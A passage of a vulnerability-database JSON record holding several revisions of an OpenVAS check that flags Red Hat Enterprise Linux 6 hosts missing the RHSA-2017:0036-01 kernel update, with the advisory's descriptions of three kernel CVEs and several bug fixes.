rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "title": "RedHat Update for kernel RHSA-2017:0036-01", "type": "openvas", "viewCount": 6}, "differentElements": ["modified", "sourceData"], "edition": 4, "lastseen": "2018-09-01T23:41:20"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-6828", "CVE-2016-4998"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Check the version of kernel", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "158d150076abe42bd60f958a429718270610bbbdd4a1c438b960beead662ea17", "hashmap": [{"hash": "a2323bbbec1269474bb5afba0147298f", "key": "reporter"}, {"hash": "c9281e1b56460aeb5f0f661590c96de8", "key": "sourceData"}, {"hash": "93a870a4cbcc9909bb7a08ec42ea9932", "key": "published"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "feceaea3db20f1b814abfc37b7161f7a", "key": "pluginID"}, {"hash": "e7abf60a84a5ac895309f72a03411643", "key": "description"}, {"hash": "c6d142ba7241ded12da1b709539a85f1", "key": "title"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "ecdc2643d713b3eb6cd330f4da8f9899", "key": "href"}, {"hash": "8434f1de2dfcb7b7b6c8b0e1d09bad6c", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "09523d8f0673a86c66db6888d75720f7", "key": "references"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}, {"hash": "342cc90fff603913e7fb1060eccdf48e", "key": "modified"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871742", "id": "OPENVAS:1361412562310871742", "lastseen": "2018-11-16T12:51:55", "modified": "2018-11-16T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310871742", "published": "2017-01-11T00:00:00", "references": ["2017:0036-01", "https://www.redhat.com/archives/rhsa-announce/2017-January/msg00012.html"], "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2017:0036-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871742\");\n script_version(\"$Revision: 12370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 08:56:29 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-11 05:38:12 +0100 (Wed, 11 Jan 2017)\");\n script_cve_id(\"CVE-2016-4998\", \"CVE-2016-6828\", \"CVE-2016-7117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2017:0036-01\");\n script_tag(name: \"summary\", value: \"Check the version of kernel\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernels socket recvmmsg\nsubsystem. This may allow remote attackers to corrupt memory and may allow\nexecution of arbitrary code. This corruption takes place during the error\nhandling routines within __sys_recvmmsg() function. (CVE-2016-7117,\nImportant)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap\ndisclosure, or further impact was found in setsockopt(). The function call\nis normally restricted to root, however some processes with cap_sys_admin\nmay also be able to trigger this flaw in privileged container environments.\n(CVE-2016-4998, Moderate)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and\nother tcp_* functions. This condition could allow an attacker to send an\nincorrect selective acknowledgment to existing connections, possibly\nresetting a connection. (CVE-2016-6828, Moderate)\n\nBug Fix(es):\n\n* When parallel NFS returned a file layout, a kernel crash sometimes\noccurred. This update removes the call to the BUG_ON() function from a code\npath of a client that returns the file layout. As a result, the kernel no\nlonger crashes in the described situation. (BZ#1385480)\n\n* When a guest virtual machine (VM) on Microsoft Hyper-V was set to crash\non a Nonmaskable Interrupt (NMI) that was injected from the host, this VM\nbecame unresponsive and did not create the vmcore dump file. This update\napplies a set of patches to the Virtual Machine Bus kernel driver\n(hv_vmbus) that fix this bug. As a result, the VM now first creates and\nsaves the vmcore dump file and then reboots. (BZ#1385482)\n\n* From Red Hat Enterprise Linux 6.6 to 6.8, the IPv6 routing cache\noccasionally showed incorrect values. This update fixes the DST_NOCOUNT\nmechanism, and the IPv6 routing cache now shows correct values.\n(BZ#1391974)\n\n* When using the ixgbe driver and the software Fibre Channel over Ethernet\n(FCoE) stack, suboptimal performance in some cases occurred on systems with\na large number of CPUs. This update fixes the fc_exch_alloc() function to\ntry all the available exchange managers in the list for an available\nexchange ID. This change avoids failing allocations, which previously led\nto the host busy status. (BZ#1392818)\n\n* When the vmwgfx kernel module loads, it overrides the boot resolution\nautomatically. Consequently, users were not able to change the resolution\nby manual setting of the kernel's 'vga=' ... \n\n Description truncated, for more information please check the Reference URL\");\n script_tag(name: \"affected\", value: \"kernel on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"RHSA\", value: \"2017:0036-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2017-January/msg00012.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "title": "RedHat Update for kernel RHSA-2017:0036-01", "type": "openvas", "viewCount": 6}, "differentElements": ["description", "sourceData"], "edition": 5, "lastseen": "2018-11-16T12:51:55"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-6828", "CVE-2016-4998"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is missing an update for the ", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "6b42b978c0d94a992a6ff7be17cfb02a10b171cb20f39a9f69340488ff77239b", "hashmap": [{"hash": "a2323bbbec1269474bb5afba0147298f", "key": "reporter"}, {"hash": "93a870a4cbcc9909bb7a08ec42ea9932", "key": "published"}, {"hash": "1693b96dcccf4fbcd463bf8baaa2bf3f", "key": "description"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "a895f0bf3d650f07c41a36d639d595c2", "key": "sourceData"}, {"hash": "feceaea3db20f1b814abfc37b7161f7a", "key": "pluginID"}, {"hash": "c6d142ba7241ded12da1b709539a85f1", "key": "title"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "ecdc2643d713b3eb6cd330f4da8f9899", "key": "href"}, {"hash": "8434f1de2dfcb7b7b6c8b0e1d09bad6c", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "09523d8f0673a86c66db6888d75720f7", "key": "references"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}, {"hash": "342cc90fff603913e7fb1060eccdf48e", "key": "modified"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871742", "id": "OPENVAS:1361412562310871742", "lastseen": "2018-11-19T12:57:06", "modified": "2018-11-16T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310871742", "published": "2017-01-11T00:00:00", "references": ["2017:0036-01", "https://www.redhat.com/archives/rhsa-announce/2017-January/msg00012.html"], "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2017:0036-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871742\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-11 05:38:12 +0100 (Wed, 11 Jan 2017)\");\n script_cve_id(\"CVE-2016-4998\", \"CVE-2016-6828\", \"CVE-2016-7117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2017:0036-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n * A use-after-free vulnerability was found in the kernels socket recvmmsg\nsubsystem. This may allow remote attackers to corrupt memory and may allow\nexecution of arbitrary code. This corruption takes place during the error\nhandling routines within __sys_recvmmsg() function. (CVE-2016-7117,\nImportant)\n\n * An out-of-bounds heap memory access leading to a Denial of Service, heap\ndisclosure, or further impact was found in setsockopt(). The function call\nis normally restricted to root, however some processes with cap_sys_admin\nmay also be able to trigger this flaw in privileged container environments.\n(CVE-2016-4998, Moderate)\n\n * A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and\nother tcp_* functions. This condition could allow an attacker to send an\nincorrect selective acknowledgment to existing connections, possibly\nresetting a connection. (CVE-2016-6828, Moderate)\n\nBug Fix(es):\n\n * When parallel NFS returned a file layout, a kernel crash sometimes\noccurred. This update removes the call to the BUG_ON() function from a code\npath of a client that returns the file layout. As a result, the kernel no\nlonger crashes in the described situation. (BZ#1385480)\n\n * When a guest virtual machine (VM) on Microsoft Hyper-V was set to crash\non a Nonmaskable Interrupt (NMI) that was injected from the host, this VM\nbecame unresponsive and did not create the vmcore dump file. This update\napplies a set of patches to the Virtual Machine Bus kernel driver\n(hv_vmbus) that fix this bug. As a result, the VM now first creates and\nsaves the vmcore dump file and then reboots. (BZ#1385482)\n\n * From Red Hat Enterprise Linux 6.6 to 6.8, the IPv6 routing cache\noccasionally showed incorrect values. This update fixes the DST_NOCOUNT\nmechanism, and the IPv6 routing cache now shows correct values.\n(BZ#1391974)\n\n * When using the ixgbe driver and the software Fibre Channel over Ethernet\n(FCoE) stack, suboptimal performance in some cases occurred on systems with\na large number of CPUs. This update fixes the fc_exch_alloc() function to\ntry all the available exchange managers in the list for an available\nexchange ID. This change avoids failing allocations, which previously led\nto the host busy status. (BZ#1392818)\n\n * When the vmwgfx kernel module loads, it overrides the boot resolution\nautomatically. Consequently, users were not able to change the resolution\nby manual setting of the kernel's 'vga=' ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"kernel on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:0036-01\");\n script_xref(name:\"URL\" , value:\"https://www.redhat.com/archives/rhsa-announce/2017-January/msg00012.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "title": "RedHat Update for kernel RHSA-2017:0036-01", "type": "openvas", "viewCount": 6}, "differentElements": ["modified", "sourceData"], "edition": 6, "lastseen": "2018-11-19T12:57:06"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-6828", "CVE-2016-4998"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Check the version of kernel", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "5e1b4013872429c416c069e8e87497bf953ef486e902ddf07a6943a03abe60ef", "hashmap": [{"hash": "a2323bbbec1269474bb5afba0147298f", "key": "reporter"}, {"hash": "93a870a4cbcc9909bb7a08ec42ea9932", "key": "published"}, {"hash": "da63064ac29a598defb6bfdc86824d3b", "key": "sourceData"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "602bced6320cec4ab33d131e0b746b65", "key": "modified"}, {"hash": "feceaea3db20f1b814abfc37b7161f7a", "key": "pluginID"}, {"hash": "e7abf60a84a5ac895309f72a03411643", "key": "description"}, {"hash": "c6d142ba7241ded12da1b709539a85f1", "key": "title"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "ecdc2643d713b3eb6cd330f4da8f9899", "key": "href"}, {"hash": "8434f1de2dfcb7b7b6c8b0e1d09bad6c", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "09523d8f0673a86c66db6888d75720f7", "key": "references"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871742", "id": "OPENVAS:1361412562310871742", "lastseen": "2017-07-27T10:57:15", "modified": "2017-07-12T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310871742", "published": "2017-01-11T00:00:00", "references": ["2017:0036-01", "https://www.redhat.com/archives/rhsa-announce/2017-January/msg00012.html"], "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2017:0036-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871742\");\n script_version(\"$Revision: 6691 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:51:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-11 05:38:12 +0100 (Wed, 11 Jan 2017)\");\n script_cve_id(\"CVE-2016-4998\", \"CVE-2016-6828\", \"CVE-2016-7117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2017:0036-01\");\n script_tag(name: \"summary\", value: \"Check the version of kernel\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernels socket recvmmsg\nsubsystem. This may allow remote attackers to corrupt memory and may allow\nexecution of arbitrary code. This corruption takes place during the error\nhandling routines within __sys_recvmmsg() function. (CVE-2016-7117,\nImportant)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap\ndisclosure, or further impact was found in setsockopt(). The function call\nis normally restricted to root, however some processes with cap_sys_admin\nmay also be able to trigger this flaw in privileged container environments.\n(CVE-2016-4998, Moderate)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and\nother tcp_* functions. This condition could allow an attacker to send an\nincorrect selective acknowledgment to existing connections, possibly\nresetting a connection. (CVE-2016-6828, Moderate)\n\nBug Fix(es):\n\n* When parallel NFS returned a file layout, a kernel crash sometimes\noccurred. This update removes the call to the BUG_ON() function from a code\npath of a client that returns the file layout. As a result, the kernel no\nlonger crashes in the described situation. (BZ#1385480)\n\n* When a guest virtual machine (VM) on Microsoft Hyper-V was set to crash\non a Nonmaskable Interrupt (NMI) that was injected from the host, this VM\nbecame unresponsive and did not create the vmcore dump file. This update\napplies a set of patches to the Virtual Machine Bus kernel driver\n(hv_vmbus) that fix this bug. As a result, the VM now first creates and\nsaves the vmcore dump file and then reboots. (BZ#1385482)\n\n* From Red Hat Enterprise Linux 6.6 to 6.8, the IPv6 routing cache\noccasionally showed incorrect values. This update fixes the DST_NOCOUNT\nmechanism, and the IPv6 routing cache now shows correct values.\n(BZ#1391974)\n\n* When using the ixgbe driver and the software Fibre Channel over Ethernet\n(FCoE) stack, suboptimal performance in some cases occurred on systems with\na large number of CPUs. This update fixes the fc_exch_alloc() function to\ntry all the available exchange managers in the list for an available\nexchange ID. This change avoids failing allocations, which previously led\nto the host busy status. (BZ#1392818)\n\n* When the vmwgfx kernel module loads, it overrides the boot resolution\nautomatically. Consequently, users were not able to change the resolution\nby manual setting of the kernel's 'vga=' ... \n\n Description truncated, for more information please check the Reference URL\");\n script_tag(name: \"affected\", value: \"kernel on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"RHSA\", value: \"2017:0036-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2017-January/msg00012.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", 